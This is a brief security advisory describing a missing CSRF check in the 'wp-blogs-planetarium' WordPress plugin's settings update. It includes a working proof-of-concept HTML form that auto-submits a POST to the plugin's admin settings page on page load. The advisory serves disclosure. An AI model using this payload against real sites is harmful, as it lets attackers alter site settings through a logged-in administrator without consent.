Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack
<form action="https://example.com/wp-admin/options-general.php?page=wp-blogs-planetarium%2Fwbp.php" method="POST">
<input type="text" name="key" value="hacked">
</form>
<script>
document.forms[0].submit();
</script>